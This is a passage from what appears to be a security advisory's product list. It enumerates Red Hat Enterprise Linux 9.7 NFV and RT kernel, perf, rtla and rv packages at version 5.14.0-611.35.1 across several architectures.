"NFV-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
